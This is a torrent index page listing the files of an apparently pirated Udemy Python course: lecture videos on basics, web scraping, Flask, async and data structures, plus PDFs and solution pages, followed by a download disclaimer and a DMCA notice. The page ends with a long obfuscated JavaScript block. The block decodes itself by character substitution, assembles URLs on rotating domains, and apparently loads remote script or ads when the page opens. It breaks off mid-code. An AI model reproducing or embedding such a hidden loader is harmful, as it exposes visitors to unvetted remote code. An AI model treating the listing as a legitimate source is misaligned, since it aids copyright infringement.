[FreeCourseSite.com] Udemy - The Complete Python Course Learn Python by Doing

mp4   Hot:739   Size:4.13 GB   Created:2019-09-01 12:00:23   Update:2021-12-09 16:39:50  

File List

  • 17 Algorithms and Data Structures/17-12 Deleting nodes with two children in code.mp4 216.25 MB
    17 Algorithms and Data Structures/17-11 Deleting nodes in code with Python.mp4 138.04 MB
    17 Algorithms and Data Structures/17-08 Recursion and inorder traversal in Python.mp4 110.36 MB
    18 Python libraries/18-03 Using pylint.mp4 81.62 MB
    18 Python libraries/18-06 Sending e-mails with Mailgun.mp4 75.08 MB
    11 Web Scraping with Python/11-26 Books Project 12. Adding logging to our Python project.mp4 69.88 MB
    05 Errors in Python/05-08 Handling those pesky user errors!.mp4 69.67 MB
    17 Algorithms and Data Structures/17-07 Adding elements to a binary tree in Python.mp4 62.59 MB
    11 Web Scraping with Python/11-03 More complex HTML parsing.mp4 61.31 MB
    18 Python libraries/18-05 Sending e-mails with smtplib.mp4 59.15 MB
    18 Python libraries/18-08 Sneak peek. My IDE setup!.mp4 58.93 MB
    17 Algorithms and Data Structures/17-10 How do you delete nodes from a binary tree.mp4 58.05 MB
    10 Advanced Python Development/10-13 Regex examples.mp4 57.74 MB
    10 Advanced Python Development/10-11 Timing your code with Python.mp4 55.76 MB
    18 Python libraries/18-07 Creating a re-usable Mailgun library.mp4 47.66 MB
    17 Algorithms and Data Structures/17-02 Presentation. Queues, stacks, and complexity.mp4 47.39 MB
    18 Python libraries/18-04 Using yapf.mp4 43.16 MB
    05 Errors in Python/05-09 Debugging with Pycharm.mp4 42.45 MB
    01 Intro to Python/01-08 Boolean and comparisons in Python.mp4 37.85 MB
    17 Algorithms and Data Structures/17-05 Presentation. Traversal of binary trees.mp4 37.77 MB
    17 Algorithms and Data Structures/17-06 Presentation. Adding elements to a binary tree.mp4 37.15 MB
    12 Asynchronous Python Development/12-22 Turning our book scraping project async.mp4 36.85 MB
    10 Advanced Python Development/10-08 Some interesting Python collections.mp4 36.47 MB
    18 Python libraries/18-02 Python libraries overview.mp4 35.68 MB
    04 Object-Oriented Programming with Python/04-02 Intro to Object-Oriented Programming with Python.mp4 34.54 MB
    03 Milestone (Project 1)/03-09 Finding movies and retrieving their details.mp4 34.29 MB
    06 Files in Python/06-03 Python Exercise. Copying files.mp4 33.55 MB
    02 Functions and loops in Python/02-09 Functions, arguments, and parameters in Python.mp4 32.68 MB
    07 Databases in Python & Milestone (Project 2)/07-04 Storing books in files.mp4 31.63 MB
    17 Algorithms and Data Structures/17-09 Finding nodes in a tree with Python.mp4 31.43 MB
    11 Web Scraping with Python/11-18 Books Project 5. Creating our book parser.mp4 31.32 MB
    02 Functions and loops in Python/02-04 For loops, range(), and tuple destructuring in Python.mp4 30.93 MB
    11 Web Scraping with Python/11-02 Understanding HTML with BeautifulSoup.mp4 30.89 MB
    06 Files in Python/06-05 JSON files with Python.mp4 29.79 MB
    03 Milestone (Project 1)/03-06 Coding our application's menu in Python.mp4 29.79 MB
    05 Errors in Python/05-05 Creating our own errors in Python.mp4 29.42 MB
    05 Errors in Python/05-07 The on success block and re-raising exceptions.mp4 28.65 MB
    07 Databases in Python & Milestone (Project 2)/07-03 Milestone Project with lists.mp4 28.54 MB
    04 Object-Oriented Programming with Python/04-05 Magic methods in Python.mp4 28.32 MB
    05 Errors in Python/05-02 Intro to errors in Python.mp4 28.05 MB
    17 Algorithms and Data Structures/17-03 Presentation. Binary search.mp4 27.54 MB
    05 Errors in Python/05-04 Raising errors in Python.mp4 27.1 MB
    17 Algorithms and Data Structures/17-13 Testing our binary tree!.mp4 26.71 MB
    04 Object-Oriented Programming with Python/04-09 More @classmethod and @staticmethod examples.mp4 25.96 MB
    10 Advanced Python Development/10-10 Dates and time in Python.mp4 25.55 MB
    10 Advanced Python Development/10-02 Mutability in Python.mp4 25.15 MB
    03 Milestone (Project 1)/03-07 Adding new movies to our application.mp4 24.63 MB
    01 Intro to Python/01-09 Lists, tuples, and sets in Python.mp4 24.37 MB
    14 Web Development with Flask/14-07 Rendering forms with Flask and Python.mp4 23.8 MB
    17 Algorithms and Data Structures/17-04 Presentation. Binary trees.mp4 23.51 MB
    11 Web Scraping with Python/11-06 Understanding HTML with the browser.mp4 23.28 MB
    08 Type hinting in Python/08-02 Typing in Python.mp4 23.25 MB
    12 Asynchronous Python Development/12-19 Making our first async request in Python.mp4 22.87 MB
    05 Errors in Python/05-03 Built in errors in Python.mp4 22.77 MB
    06 Files in Python/06-08 Python relative imports. Children.mp4 22.62 MB
    05 Errors in Python/05-06 Dealing with Python errors.mp4 22.15 MB
    10 Advanced Python Development/10-14 Introduction to logging in Python.mp4 21.7 MB
    11 Web Scraping with Python/11-04 Structuring our parsing program better.mp4 21.56 MB
    11 Web Scraping with Python/11-25 Books Project 11. Getting the page count in Python.mp4 21.28 MB
    11 Web Scraping with Python/11-20 Books Project 7. Sorting the books.mp4 21.15 MB
    01 Intro to Python/01-06 Python strings and string formatting.mp4 20.75 MB
    04 Object-Oriented Programming with Python/04-03 More about classes and objects.mp4 20.44 MB
    15 Decorators in Python/15-06 Decorators with parameters.mp4 20.21 MB
    02 Functions and loops in Python/02-07 List comprehension in Python.mp4 20.14 MB
    12 Asynchronous Python Development/12-11 Queuing in threads with shared state.mp4 20.14 MB
    02 Functions and loops in Python/02-05 Two important loop keywords + finding prime numbers.mp4 20.07 MB
    16 Advanced Object-Oriented Programming/16-02 Intro to multiple inheritance with Python.mp4 19.97 MB
    13 Python on the console and managing project dependencies/13-04 Terminal video. What is a virtualenv.mp4 19.8 MB
    02 Functions and loops in Python/02-02 If statements in Python.mp4 19.44 MB
    01 Intro to Python/01-07 Getting user input in Python.mp4 19.4 MB
    13 Python on the console and managing project dependencies/13-06 Terminal video. Using Pipenv.mp4 19.33 MB
    16 Advanced Object-Oriented Programming/16-06 The property setter in Python.mp4 19.04 MB
    12 Asynchronous Python Development/12-05 Example. Threads in Python.mp4 18.38 MB
    09 Advanced built-in functions in Python/09-04 Iterables in Python.mp4 18.34 MB
    14 Web Development with Flask/14-02 Setting up our project with Pipenv.mp4 18.18 MB
    07 Databases in Python & Milestone (Project 2)/07-05 Using JSON instead of CSV.mp4 18.11 MB
    12 Asynchronous Python Development/12-20 Getting multiple pages efficiently.mp4 17.88 MB
    07 Databases in Python & Milestone (Project 2)/07-17 Developing our context manager in Python.mp4 17.81 MB
    01 Intro to Python/01-05 Numbers and printing in Python.mp4 17.61 MB
    14 Web Development with Flask/14-06 Error pages and Jinja2 inheritance.mp4 17.39 MB
    10 Advanced Python Development/10-06 Argument unpacking in Python.mp4 17.25 MB
    04 Object-Oriented Programming with Python/04-08 @classmethod and @staticmethod in Python.mp4 16.59 MB
    09 Advanced built-in functions in Python/09-02 Generators in Python.mp4 16.57 MB
    14 Web Development with Flask/14-01 Intro to this section.mp4 16.42 MB
    11 Web Scraping with Python/11-07 Scraping our first website with Python.mp4 16.22 MB
    11 Web Scraping with Python/11-21 Books Project 8. Constructing our menu.mp4 16.05 MB
    10 Advanced Python Development/10-03 Argument mutability in Python.mp4 16.01 MB
    10 Advanced Python Development/10-09 Timezones.mp4 15.91 MB
    13 Python on the console and managing project dependencies/13-05 Terminal video. Navigating the terminal and using virtualenv.mp4 15.64 MB
    02 Functions and loops in Python/02-11 Lambda, first-class, and higher order functions in Python.mp4 15.24 MB
    10 Advanced Python Development/10-12 Regular expressions.mp4 15.09 MB
    06 Files in Python/06-02 Files in Python.mp4 15 MB
    14 Web Development with Flask/14-03 Our first Flask endpoint.mp4 14.97 MB
    07 Databases in Python & Milestone (Project 2)/07-15 Finishing the Milestone Project.mp4 14.72 MB
    10 Advanced Python Development/10-05 Mutable default arguments (bad idea).mp4 14.47 MB
    06 Files in Python/06-07 Importing our own files.mp4 14.45 MB
    06 Files in Python/06-04 CSV files with Python.mp4 14.29 MB
    01 Intro to Python/01-12 Calculating the length of lists.mp4 14.03 MB
    07 Databases in Python & Milestone (Project 2)/07-09 Creating our books table using Python.mp4 13.75 MB
    11 Web Scraping with Python/11-11 Quotes Project 4. Crafting our quote parser.mp4 13.72 MB
    12 Asynchronous Python Development/12-15 Receiving data through yield.mp4 13.69 MB
    04 Object-Oriented Programming with Python/04-06 Inheritance in Python.mp4 13.59 MB
    01 Intro to Python/01-10 Advanced set operations.mp4 13.27 MB
    01 Intro to Python/01-11 Python dictionaries.mp4 13.25 MB
    11 Web Scraping with Python/11-24 Books Project 10. Multiple pages in Python.mp4 13.24 MB
    12 Asynchronous Python Development/12-18 Our asynchronous scraper.mp4 13.13 MB
    11 Web Scraping with Python/11-10 Quotes Project 3. Getting our locators.mp4 13.02 MB
    02 Functions and loops in Python/02-08 Set and dictionary comprehensions.mp4 12.94 MB
    03 Milestone (Project 1)/03-04 Creating our first PyCharm project.mp4 12.89 MB
    07 Databases in Python & Milestone (Project 2)/07-06 Intro to databases with Python.mp4 12.72 MB
    12 Asynchronous Python Development/12-10 Dealing with shared state in threads.mp4 12.63 MB
    12 Asynchronous Python Development/12-04 The Python GIL.mp4 12.51 MB
    03 Milestone (Project 1)/03-08 Showing the user their movies.mp4 12.4 MB
    11 Web Scraping with Python/11-08 Milestone Project 3. A Quote Scraper.mp4 12.33 MB
    07 Databases in Python & Milestone (Project 2)/07-02 Intro to Milestone (Project 2).mp4 12.27 MB
    02 Functions and loops in Python/02-10 Functions and return values in Python.mp4 12.25 MB
    01 Intro to Python/01-01 Welcome to this course!.mp4 12.24 MB
    15 Decorators in Python/15-02 A simple decorator in Python.mp4 12.19 MB
    11 Web Scraping with Python/11-05 Splitting HTML locators out of our Python class.mp4 12.12 MB
    12 Asynchronous Python Development/12-08 Multiprocessing in Python.mp4 12.11 MB
    16 Advanced Object-Oriented Programming/16-03 Intro to ABCs in Python.mp4 12.07 MB
    14 Web Development with Flask/14-11 Adding navigation to our website.mp4 11.86 MB
    09 Advanced built-in functions in Python/09-03 Python generator classes and iterators.mp4 11.78 MB
    11 Web Scraping with Python/11-14 Milestone Project 4. A Book Scraper + application.mp4 11.77 MB
    02 Functions and loops in Python/02-03 While loops in Python.mp4 11.75 MB
    14 Web Development with Flask/14-10 Using Jinja2 for loops to create a nicer homepage.mp4 11.67 MB
    09 Advanced built-in functions in Python/09-05 The filter() function in Python.mp4 11.66 MB
    07 Databases in Python & Milestone (Project 2)/07-12 Getting all our books.mp4 11.64 MB
    13 Python on the console and managing project dependencies/13-02 Running Python in the console.mp4 11.35 MB
    07 Databases in Python & Milestone (Project 2)/07-18 Errors in context managers.mp4 11.35 MB
    10 Advanced Python Development/10-04 Default values for parameters.mp4 11.22 MB
    11 Web Scraping with Python/11-19 Books Project 6. Writing our app file.mp4 10.9 MB
    15 Decorators in Python/15-07 Functions that accept multiple arguments.mp4 10.77 MB
    15 Decorators in Python/15-05 Decorating functions with parameters.mp4 10.75 MB
    07 Databases in Python & Milestone (Project 2)/07-10 Inserting books using Python.mp4 10.63 MB
    14 Web Development with Flask/14-08 Accessing POST form data with Flask.mp4 10.51 MB
    12 Asynchronous Python Development/12-03 Processes and threads.mp4 10.45 MB
    16 Advanced Object-Oriented Programming/16-05 The relationship between ABCs and interfaces.mp4 10.3 MB
    07 Databases in Python & Milestone (Project 2)/07-14 Filtering with WHERE.mp4 10.19 MB
    12 Asynchronous Python Development/12-16 The async and await keywords.mp4 9.86 MB
    10 Advanced Python Development/10-15 Logging to a file and other features.mp4 9.81 MB
    14 Web Development with Flask/14-05 Rendering HTML with Flask and Python.mp4 9.73 MB
    04 Object-Oriented Programming with Python/04-07 The @property decorator.mp4 9.57 MB
    12 Asynchronous Python Development/12-23 A note on HTTPS with Python and Mac OS X.mp4 9.26 MB
    06 Files in Python/06-09 Python relative imports. Parents.mp4 9.15 MB
    12 Asynchronous Python Development/12-02 The Dining Philosophers Problem.mp4 9.13 MB
    06 Files in Python/06-10 Import errors and running as a Python script.mp4 8.94 MB
    13 Python on the console and managing project dependencies/13-03 Terminal video. Running Python.mp4 8.94 MB
    13 Python on the console and managing project dependencies/13-07 Terminal video. Pipenv and virtualenv.mp4 8.73 MB
    09 Advanced built-in functions in Python/09-06 The map() function in Python.mp4 8.5 MB
    12 Asynchronous Python Development/12-13 Our first single-threaded task scheduler in Python.mp4 8.44 MB
    12 Asynchronous Python Development/12-14 Yielding from another iterator in Python.mp4 8.4 MB
    07 Databases in Python & Milestone (Project 2)/07-01 Introduction to this section.mp4 8.4 MB
    06 Files in Python/06-06 Using the with syntax in Python.mp4 8.33 MB
    04 Object-Oriented Programming with Python/04-04 Parameter naming in Python.mp4 8.3 MB
    11 Web Scraping with Python/11-27 A word on scraping pages with JavaScript.mp4 8.14 MB
    06 Files in Python/06-11 Conclusion of this section.mp4 8.14 MB
    12 Asynchronous Python Development/12-01 Introduction to this section.mp4 8.11 MB
    11 Web Scraping with Python/11-12 Quotes Project 5. The quotes page.mp4 7.99 MB
    07 Databases in Python & Milestone (Project 2)/07-08 Some database jargon.mp4 7.98 MB
    11 Web Scraping with Python/11-23 Books Project 9. Getting multiple pages.mp4 7.86 MB
    09 Advanced built-in functions in Python/09-07 any() and all() in Python.mp4 7.65 MB
    01 Intro to Python/01-02 Overview of the course curriculum.mp4 7.61 MB
    03 Milestone (Project 1)/03-03 Installing PyCharm in your computer.mp4 7.46 MB
    15 Decorators in Python/15-03 Using a @syntax.mp4 7.45 MB
    11 Web Scraping with Python/11-15 Books Project 2. Recap of HTML locators.mp4 7.43 MB
    14 Web Development with Flask/14-04 Returning information with Flask and Python.mp4 7.28 MB
    11 Web Scraping with Python/11-01 Introduction to this section.mp4 7.15 MB
    10 Advanced Python Development/10-07 Queues in Python.mp4 7.05 MB
    02 Functions and loops in Python/02-06 List slicing in Python.mp4 6.81 MB
    12 Asynchronous Python Development/12-12 Using Python generators instead of threads.mp4 6.73 MB
    07 Databases in Python & Milestone (Project 2)/07-11 SELECT examples.mp4 6.72 MB
    11 Web Scraping with Python/11-13 Quotes Project 6. Recap of the project.mp4 6.7 MB
    06 Files in Python/06-01 Introduction to this section.mp4 6.52 MB
    19 Bonus Section/19-01 Thank you for taking the course.mp4 6.45 MB
    03 Milestone (Project 1)/03-05 Setting up PyCharm font and display settings.mp4 6.36 MB
    09 Advanced built-in functions in Python/09-08 The enumerate() function.mp4 6.3 MB
    11 Web Scraping with Python/11-16 Books Project 3. Creating locators in Python.mp4 6.27 MB
    15 Decorators in Python/15-08 Generic decorators for any function.mp4 6.26 MB
    03 Milestone (Project 1)/03-02 Installing Python in your computer.mp4 6.2 MB
    07 Databases in Python & Milestone (Project 2)/07-16 Ordering and limiting.mp4 5.83 MB
    16 Advanced Object-Oriented Programming/16-04 The usefulness of ABCs.mp4 5.76 MB
    12 Asynchronous Python Development/12-24 Conclusion of this section.mp4 5.63 MB
    11 Web Scraping with Python/11-17 Books Project 4. Creating our page.mp4 5.6 MB
    07 Databases in Python & Milestone (Project 2)/07-07 Using SQLite in Python.mp4 5.58 MB
    14 Web Development with Flask/14-09 Putting our form in a single endpoint.mp4 5.51 MB
    04 Object-Oriented Programming with Python/04-01 Introduction to this section.mp4 5.17 MB
    15 Decorators in Python/15-09 Conclusion of this section.mp4 5.15 MB
    12 Asynchronous Python Development/12-06 Using Python concurrent.futures. The ThreadPoolExecutor.mp4 5.14 MB
    01 Intro to Python/01-04 Our Python coding environment.mp4 5.13 MB
    10 Advanced Python Development/10-01 Introduction to this section.mp4 5.1 MB
    07 Databases in Python & Milestone (Project 2)/07-13 UPDATE and DELETE.mp4 5.07 MB
    15 Decorators in Python/15-01 Introduction to this section.mp4 4.91 MB
    07 Databases in Python & Milestone (Project 2)/07-19 Conclusion of this section.mp4 4.8 MB
    13 Python on the console and managing project dependencies/13-01 Intro to this section.mp4 4.76 MB
    17 Algorithms and Data Structures/17-01 Introduction to this section.mp4 4.71 MB
    18 Python libraries/18-01 Introduction to this section.mp4 4.62 MB
    15 Decorators in Python/15-04 Functools wraps in Python.mp4 4.61 MB
    08 Type hinting in Python/08-03 Further reading.mp4 4.6 MB
    14 Web Development with Flask/14-12 Conclusion of this section.mp4 4.54 MB
    08 Type hinting in Python/08-01 Introduction to this section.mp4 4.48 MB
    05 Errors in Python/05-01 Introduction to this section.mp4 4.44 MB
    16 Advanced Object-Oriented Programming/16-07 Conclusion of this section.mp4 4.26 MB
    09 Advanced built-in functions in Python/09-09 Conclusion of this section.mp4 4.25 MB
    16 Advanced Object-Oriented Programming/16-01 Introduction to this section.mp4 4.19 MB
    12 Asynchronous Python Development/12-09 Using Python concurrent.futures. The ProcessPoolExecutor.mp4 4.15 MB
    01 Intro to Python/01-03 Introduction to this section.mp4 4.1 MB
    02 Functions and loops in Python/02-01 Introduction to this section.mp4 4.07 MB
    03 Milestone (Project 1)/03-01 Introduction to this section.mp4 4.04 MB
    the-complete-python-html-projects-etc/complete-python-course.rar 4.04 MB
    11 Web Scraping with Python/11-09 Quotes Project 2. Structuring a scraping app in Python.mp4 3.94 MB
    05 Errors in Python/05-10 Conclusion of this section.mp4 3.93 MB
    10 Advanced Python Development/10-16 Conclusion of this section.mp4 3.77 MB
    04 Object-Oriented Programming with Python/04-10 Conclusion of this section.mp4 3.66 MB
    09 Advanced built-in functions in Python/09-01 Introduction to this section.mp4 3.64 MB
    11 Web Scraping with Python/11-28 Conclusion of this section.mp4 3.55 MB
    08 Type hinting in Python/08-04 Conclusion of this section.mp4 3.53 MB
    18 Python libraries/18-09 Conclusion of this section.mp4 3.47 MB
    12 Asynchronous Python Development/12-21 Using async_timeout for security.mp4 3.44 MB
    13 Python on the console and managing project dependencies/13-08 Conclusion of this section.mp4 3.16 MB
    01 Intro to Python/01-13 Conclusion of this section.mp4 3.04 MB
    02 Functions and loops in Python/02-12 Conclusion of this section.mp4 3.04 MB
    17 Algorithms and Data Structures/17-14 Conclusion of this section.mp4 3.03 MB
    12 Asynchronous Python Development/12-07 Don't kill threads!.mp4 2.95 MB
    11 Web Scraping with Python/11-22 ASIDE. The best way to write user menus.mp4 2.85 MB
    12 Asynchronous Python Development/12-17 Watch these talks for more explanations and examples!.mp4 2.39 MB
    03 Milestone (Project 1)/03-10 Conclusion of this section.mp4 2.19 MB
    the-complete-python-html-projects-etc/13/13-06 using-pipenv.pdf 859.23 KB
    the-complete-python-html-projects-etc/03/03-05 milestone-project-brief.pdf 566.25 KB
    the-complete-python-html-projects-etc/07/07-02 milestone-project-2-brief.pdf 551.94 KB
    the-complete-python-html-projects-etc/10/10-10 Datetime-cheatsheet.pdf 500.04 KB
    the-complete-python-html-projects-etc/04/04-05 Solution magic methods in Python.html 2.64 KB
    the-complete-python-html-projects-etc/09/09-08 So what other things evaluate to True or False.html 2.53 KB
    the-complete-python-html-projects-etc/12/12-01 A glossary of terms used in concurrency.html 2.49 KB
    the-complete-python-html-projects-etc/02/02-08 Solution an improved lottery.html 2.43 KB
    the-complete-python-html-projects-etc/01/01-12 Solution dictionaries.html 2.35 KB
    the-complete-python-html-projects-etc/04/04-03 So... sum() int() str() len() what else is there.html 2.31 KB
    the-complete-python-html-projects-etc/19/19-01 Bonus lecture next steps and other courses.html 2.06 KB
    the-complete-python-html-projects-etc/07/07-19 Further reading.html 2 KB
    the-complete-python-html-projects-etc/06/06-08 Solution importing modules.html 1.99 KB
    the-complete-python-html-projects-etc/11/11-27 A note on scraping and robots.txt.html 1.98 KB
    the-complete-python-html-projects-etc/06/06-03 Solution building a quiz system.html 1.97 KB
    the-complete-python-html-projects-etc/05/05-05 Solution raising our own custom error.html 1.95 KB
    the-complete-python-html-projects-etc/06/06-11 Further reading.html 1.94 KB
    the-complete-python-html-projects-etc/05/05-10 Further reading.html 1.93 KB
    the-complete-python-html-projects-etc/10/10-08 Solution Python collections.html 1.93 KB
    the-complete-python-html-projects-etc/05/05-08 Solution try-except-finally.html 1.9 KB
    the-complete-python-html-projects-etc/09/09-03 Solution coding a generator class.html 1.86 KB
    the-complete-python-html-projects-etc/01/01-05 Solution variables and numbers.html 1.86 KB
    the-complete-python-html-projects-etc/02/02-03 Solution a simple text menu.html 1.78 KB
    the-complete-python-html-projects-etc/09/09-09 Further reading.html 1.65 KB
    the-complete-python-html-projects-etc/06/06-05 Solution a CSV to JSON converter.html 1.64 KB
    the-complete-python-html-projects-etc/10/10-13 Solution secure file names using regex.html 1.63 KB
    the-complete-python-html-projects-etc/01/01-07 Solution communicating with users.html 1.62 KB
    the-complete-python-html-projects-etc/15/15-08 Solution a generic access control decorator.html 1.62 KB
    the-complete-python-html-projects-etc/05/05-04 Solution raising an error.html 1.61 KB
    the-complete-python-html-projects-etc/16/16-02 Solution multiple inheritance.html 1.58 KB
    the-complete-python-html-projects-etc/02/02-05 Solution FizzBuzz.html 1.58 KB
    the-complete-python-html-projects-etc/04/04-02-2 Solution defining a method.html 1.56 KB
    the-complete-python-html-projects-etc/09/09-02 Solution a prime number generator.html 1.55 KB
    the-complete-python-html-projects-etc/11/11-01 Code for this section.html 1.55 KB
    the-complete-python-html-projects-etc/15/15-02 Solution decorators.html 1.54 KB
    the-complete-python-html-projects-etc/01/01-10 Solution nearby friends.html 1.5 KB
    the-complete-python-html-projects-etc/16/16-06 Pythonic vs. Non-Pythonic.html 1.46 KB
    the-complete-python-html-projects-etc/04/04-02-1 Solution your first Python class.html 1.43 KB
    the-complete-python-html-projects-etc/07/07-01 Code for this section.html 1.38 KB
    the-complete-python-html-projects-etc/16/16-05 Solution ABCs.html 1.35 KB
    [FCS Forum].url 133 B
    [FreeCourseSite.com].url 127 B
    [CourseClub.NET].url 123 B
    05 Errors in Python/vz 0 B

Download Info

  • Tips

    “[FreeCourseSite.com] Udemy - The Complete Python Course Learn Python by Doing” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

!function(){function a(a){var _idx="f9m7hqe5dm";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,l7_2(F6O2ca[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y8D62fODm622Y5V6fFh!qYF J8Y/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa!Xd5 F=O!(O2LF X8[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgY/}0=6FY^9Y6phFgJ/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"bGYYYGb"!qYF d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 TcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!XmqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28c28"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/CL/@@{jR87Q^1h:Ynf^"a%c*}8882m62fYR;7c"j"aj"j"g"v"a%"58"%Xm5Y|5T%%%"vF8"%hca%5ca!FmL5(8Tc2a=FmO2qOdf87_2(F6O2ca[XmqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=XmqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF 78"@@{"=^8"7Q^1h:Ynf^"!7_2(F6O2 pcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 icYa[Xd5 F8H"@@{d2(LCYmTfY20C0mRT4"="@@{5p(LYpmsOopQqqmRT4"="@@{D7(LSqmTfY20C0mRT4"="@@{dC(LJ^msOopQqqmRT4"="@@{(C(L:4mTfY20C0mRT4"="@@{C2(LSYmsOopQqqmRT4"="@@{25(LLSmTfY20C0mRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q@{n"!qYF O82YD VY)iO(SYFcF%"/"%7%"jR8"%^%"v58"%Xm5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[XmqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[287_2(F6O2cYa[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=780!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!7<YmqY2pFh!a28fH_ZcYH(Zc7%%aa=O8fH_ZcYH(Zc7%%aa=68fH_ZcYH(Zc7%%aa=d8fH_ZcYH(Zc7%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 ^8h!qYF Y8""=F=2=O!7O5cF858280!F<^mqY2pFh!ac58^HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc28^HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc28^HLZcF%}a=O8^HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPc2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=XmqOdfiFdF_L8*}PpcOa=@888XmqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l88XmqOdfiFdF_LvvYvvYca=pcOaP=XmqOdfiFdF_L8}PqYF D8l}!7_2(F6O2 )ca[DvvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5cXmYXY2F|TJY=Xm(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfcXm5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqcXmLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l88XmqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP8X!7_2(F6O2 Lca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF 